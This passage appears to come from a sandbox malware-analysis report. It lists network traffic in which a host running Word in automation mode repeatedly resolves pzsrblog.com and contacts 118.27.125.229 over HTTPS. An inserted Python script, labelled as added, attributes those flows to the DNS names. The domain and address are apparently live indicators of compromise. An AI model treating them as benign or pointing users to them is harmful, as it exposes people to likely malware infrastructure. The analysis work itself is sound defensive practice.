    Dec 20, 2022 14:08:10.669096947 CET  49178        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:10.669173956 CET  443          49178      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:10.669255018 CET  49178        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:10.669528008 CET  49178        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:10.669563055 CET  443          49178      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:11.254982948 CET  443          49178      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:11.257827997 CET  49178        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:11.257889032 CET  443          49178      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:11.259048939 CET  49178        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:11.259067059 CET  443          49178      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:11.835972071 CET  443          49178      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:11.837253094 CET  49178        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:11.868597984 CET  49179        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:11.868653059 CET  443          49179      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:11.868730068 CET  49179        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:11.868887901 CET  49179        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:11.868901968 CET  443          49179      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:12.451721907 CET  443          49179      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:12.451900005 CET  49179        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:12.474200964 CET  49179        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:12.474298000 CET  443          49179      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:12.474988937 CET  443          49179      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:12.475095034 CET  49179        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:12.498498917 CET  49179        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:12.498554945 CET  443          49179      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:13.019915104 CET  443          49179      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:13.020112038 CET  49179        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:13.020152092 CET  443          49179      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:13.020190001 CET  443          49179      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:13.020262003 CET  49179        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:13.020289898 CET  49179        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:13.020311117 CET  443          49179      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:13.020364046 CET  49179        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:13.020445108 CET  443          49179      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:13.020512104 CET  49179        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:13.441339970 CET  49179        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:13.441390038 CET  443          49179      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:13.619105101 CET  49180        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:13.619155884 CET  443          49180      118.27.125.229  192.168.2.22
    Dec 20, 2022 14:08:13.619230032 CET  49180        443        192.168.2.22    118.27.125.229
    Dec 20, 2022 14:08:13.619653940 CET  49180        443        192.168.2.22    118.27.125.229
    UDP Packets
    Timestamp                            Source Port  Dest Port  Source IP     Dest IP
    Dec 20, 2022 14:08:00.933084011 CET  49688        53         192.168.2.22  8.8.8.8
    Dec 20, 2022 14:08:01.202795029 CET  53           49688      8.8.8.8       192.168.2.22
    Dec 20, 2022 14:08:03.900677919 CET  58836        53         192.168.2.22  8.8.8.8
    Dec 20, 2022 14:08:04.172363997 CET  53           58836      8.8.8.8       192.168.2.22
    Dec 20, 2022 14:08:04.183038950 CET  50134        53         192.168.2.22  8.8.8.8
    Dec 20, 2022 14:08:04.202842951 CET  53           50134      8.8.8.8       192.168.2.22
    Dec 20, 2022 14:08:09.143189907 CET  55275        53         192.168.2.22  8.8.8.8
    Dec 20, 2022 14:08:09.410435915 CET  53           55275      8.8.8.8       192.168.2.22
    Dec 20, 2022 14:08:09.418085098 CET  59915        53         192.168.2.22  8.8.8.8
    Dec 20, 2022 14:08:09.436068058 CET  53           59915      8.8.8.8       192.168.2.22
    Dec 20, 2022 14:08:16.610516071 CET  54408        53         192.168.2.22  8.8.8.8
    Dec 20, 2022 14:08:16.630496025 CET  53           54408      8.8.8.8       192.168.2.22
    Dec 20, 2022 14:08:16.633646965 CET  50108        53         192.168.2.22  8.8.8.8
    Dec 20, 2022 14:08:16.889527082 CET  53           50108      8.8.8.8       192.168.2.22
    DNS Queries
    Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name          Type            Class        DNS over HTTPS
    Dec 20, 2022 14:08:00.933084011 CET  192.168.2.22  8.8.8.8  0x2507    Standard query (0)  pzsrblog.com  A (IP address)  IN (0x0001)  false
    Dec 20, 2022 14:08:03.900677919 CET  192.168.2.22  8.8.8.8  0x1150    Standard query (0)  pzsrblog.com  A (IP address)  IN (0x0001)  false
    Dec 20, 2022 14:08:04.183038950 CET  192.168.2.22  8.8.8.8  0x1aac    Standard query (0)  pzsrblog.com  A (IP address)  IN (0x0001)  false
    Dec 20, 2022 14:08:09.143189907 CET  192.168.2.22  8.8.8.8  0xdc64    Standard query (0)  pzsrblog.com  A (IP address)  IN (0x0001)  false
    Dec 20, 2022 14:08:09.418085098 CET  192.168.2.22  8.8.8.8  0xbe50    Standard query (0)  pzsrblog.com  A (IP address)  IN (0x0001)  false
    Dec 20, 2022 14:08:16.610516071 CET  192.168.2.22  8.8.8.8  0xc9b     Standard query (0)  pzsrblog.com  A (IP address)  IN (0x0001)  false
    Dec 20, 2022 14:08:16.633646965 CET  192.168.2.22  8.8.8.8  0xa51f    Standard query (0)  pzsrblog.com  A (IP address)  IN (0x0001)  false
    DNS Answers
    Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name          CName  Address         Type            Class        DNS over HTTPS
    Dec 20, 2022 14:08:01.202795029 CET  8.8.8.8    192.168.2.22  0x2507    No error (0)  pzsrblog.com  -      118.27.125.229  A (IP address)  IN (0x0001)  false
    Dec 20, 2022 14:08:04.172363997 CET  8.8.8.8    192.168.2.22  0x1150    No error (0)  pzsrblog.com  -      118.27.125.229  A (IP address)  IN (0x0001)  false
    Dec 20, 2022 14:08:04.202842951 CET  8.8.8.8    192.168.2.22  0x1aac    No error (0)  pzsrblog.com  -      118.27.125.229  A (IP address)  IN (0x0001)  false
    Dec 20, 2022 14:08:09.410435915 CET  8.8.8.8    192.168.2.22  0xdc64    No error (0)  pzsrblog.com  -      118.27.125.229  A (IP address)  IN (0x0001)  false
    Dec 20, 2022 14:08:09.436068058 CET  8.8.8.8    192.168.2.22  0xbe50    No error (0)  pzsrblog.com  -      118.27.125.229  A (IP address)  IN (0x0001)  false
    Dec 20, 2022 14:08:16.630496025 CET  8.8.8.8    192.168.2.22  0xc9b     No error (0)  pzsrblog.com  -      118.27.125.229  A (IP address)  IN (0x0001)  false
    Dec 20, 2022 14:08:16.889527082 CET  8.8.8.8    192.168.2.22  0xa51f    No error (0)  pzsrblog.com  -      118.27.125.229  A (IP address)  IN (0x0001)  false
    • pzsrblog.com
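The DNS answers and the TCP packets above sit in separate tables, so the attribution has to be made by hand: each of the six TLS connections from the sandbox host to 118.27.125.229:443 (client ports 49175 to 49180) starts shortly after an A answer for pzsrblog.com, and the host resolved that name seven times within about sixteen seconds. The Python script below is an added example, not part of the Joe Sandbox report: it takes the DNS answers and the first packet of each TCP connection, re-typed from the tables above as constructed log lines, plus one made-up direct-to-IP flow to 203.0.113.5 (a TEST-NET-3 address) that no DNS answer explains, and attributes every flow to the most recent name that resolved to its destination.

```python
"""Attribute the sandbox's outbound TCP flows to DNS names by joining the
DNS answer table with the first packet of each connection. Added example,
not part of the Joe Sandbox report."""
from collections import Counter
from datetime import datetime

SANDBOX_IP = "192.168.2.22"
DAY = "2022-12-20"

# Constructed input: the seven DNS answers from the report, re-typed as
# "<time> <txid> <name> <address>".
DNS_LOG = """\
14:08:01.202795029 0x2507 pzsrblog.com 118.27.125.229
14:08:04.172363997 0x1150 pzsrblog.com 118.27.125.229
14:08:04.202842951 0x1aac pzsrblog.com 118.27.125.229
14:08:09.410435915 0xdc64 pzsrblog.com 118.27.125.229
14:08:09.436068058 0xbe50 pzsrblog.com 118.27.125.229
14:08:16.630496025 0xc9b pzsrblog.com 118.27.125.229
14:08:16.889527082 0xa51f pzsrblog.com 118.27.125.229
"""

# Constructed input: "<time> <src ip> <sport> <dst ip> <dport>" packet lines.
# The first packet of each of the six TLS connections in the report (client
# ports 49175-49180) and two of the server's replies, plus one made-up flow
# to 203.0.113.5 (TEST-NET-3) that no DNS answer explains.
TCP_LOG = """\
14:08:01.217870951 192.168.2.22 49175 118.27.125.229 443
14:08:01.217945099 118.27.125.229 443 192.168.2.22 49175
14:08:04.203759909 192.168.2.22 49176 118.27.125.229 443
14:08:04.203811884 118.27.125.229 443 192.168.2.22 49176
14:08:09.436860085 192.168.2.22 49177 118.27.125.229 443
14:08:10.669096947 192.168.2.22 49178 118.27.125.229 443
14:08:11.868597984 192.168.2.22 49179 118.27.125.229 443
14:08:13.619105101 192.168.2.22 49180 118.27.125.229 443
14:08:14.000000000 192.168.2.22 49181 203.0.113.5 80
"""


def parse_ts(text):
    """Nanosecond timestamps from the report, truncated to microseconds."""
    hms, frac = text.split(".")
    return datetime.strptime(f"{DAY} {hms}.{frac[:6]}", "%Y-%m-%d %H:%M:%S.%f")


def parse_dns(log):
    answers = []
    for line in log.splitlines():
        t, _txid, name, addr = line.split()
        answers.append((parse_ts(t), name, addr))
    return sorted(answers)


def lookup_counts(log):
    """How often each name was answered; repeated lookups of one name stand out."""
    return Counter(name for _, name, _ in parse_dns(log))


def attribute_flows(dns_log, tcp_log, client_ip=SANDBOX_IP):
    answers = parse_dns(dns_log)
    first_seen = {}
    for line in tcp_log.splitlines():
        t, src, sport, dst, dport = line.split()
        if src != client_ip:
            continue  # server-to-client packets never open a flow
        first_seen.setdefault((int(sport), dst, int(dport)), parse_ts(t))
    flows = []
    for (sport, dst, dport), start in sorted(first_seen.items(), key=lambda kv: kv[1]):
        # Most recent answer, at or before the first packet, that mapped a name to this address.
        prior = [(ts, name) for ts, name, addr in answers if addr == dst and ts <= start]
        domain, age = None, None
        if prior:
            ts, domain = prior[-1]
            age = (start - ts).total_seconds()
        flows.append({"sport": sport, "dst": dst, "dport": dport, "start": start,
                      "domain": domain, "dns_age_s": age})
    return flows


def summarize(flows):
    """Connections per (name, address, port); None as name means direct-to-IP."""
    return Counter((f["domain"], f["dst"], f["dport"]) for f in flows)


if __name__ == "__main__":
    fl = attribute_flows(DNS_LOG, TCP_LOG)
    for f in fl:
        print(f"{f['start'].time()} {f['sport']:>5} -> {f['dst']}:{f['dport']}  "
              f"{f['domain'] or 'no DNS answer'}")
    print(dict(summarize(fl)), dict(lookup_counts(DNS_LOG)))
```

The join key is the answered address, not the name, so a flow to an address no answer ever produced comes out with domain None; in a real capture that is the case to look at first, since hard-coded IP contact bypasses every DNS-based control.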
    No statistics
    Target ID:0
    Start time:14:07:14
    Start date:20/12/2022
    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Imagebase:0x13f9d0000
    File size:1423704 bytes
    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    No disassembly